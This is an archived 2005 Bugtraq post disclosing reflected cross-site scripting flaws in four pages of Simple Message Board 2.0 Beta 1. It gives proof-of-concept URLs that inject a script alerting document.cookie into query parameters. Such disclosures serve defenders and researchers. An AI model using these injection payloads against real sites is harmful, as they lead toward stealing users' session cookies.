XSS in forums Simple Message Board Version 2.0 Beta 1

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in forums Simple Message Board Version 2.0 Beta 1
From: stormhacker@xxxxxxxxxxx
Date: 14 Jul 2005 19:23:37 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

[T]his  BUGS discovered by rUnViRuS
Http://www.security-arab.com
=-=-=-=-=-=-=-=-=
xss in forums
Simple Message Board Version 2.0 Beta 1
Powered by Man and Machine, Ltd
Exploit
=-=-=-=
XSS in forum.cfm

http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert(document.cookie);</script>
=-=-=-=-=-=-
XSS in user.cfm

http://www.example.com/forum/user.cfm?UID=<script>JavaScript:alert(document.cookie);</script>
=-=-=-=-=-=
XSS in thread.cfm

http://www.example.com/forum/thread.cfm?TID=<script>JavaScript:alert(document.cookie);</script>
=-=-==-=-=-=-=-
XSS IN search.cfm

http://www.example.com/forum/search.cfm?PostDate=<script>JavaScript:alert(document.cookie);</script>
=-=-=-=-=-=-=-=-=-=

Prev by Date: 05_07_14-bitdefender_malicious_content_bypass
Next by Date: [SECURITY] [DSA 746-1] New packages fix remote command execution in phpgroupware
Previous by thread: 05_07_14-bitdefender_malicious_content_bypass
Next by thread: [SECURITY] [DSA 746-1] New packages fix remote command execution in phpgroupware
Index(es):
- Date
- Thread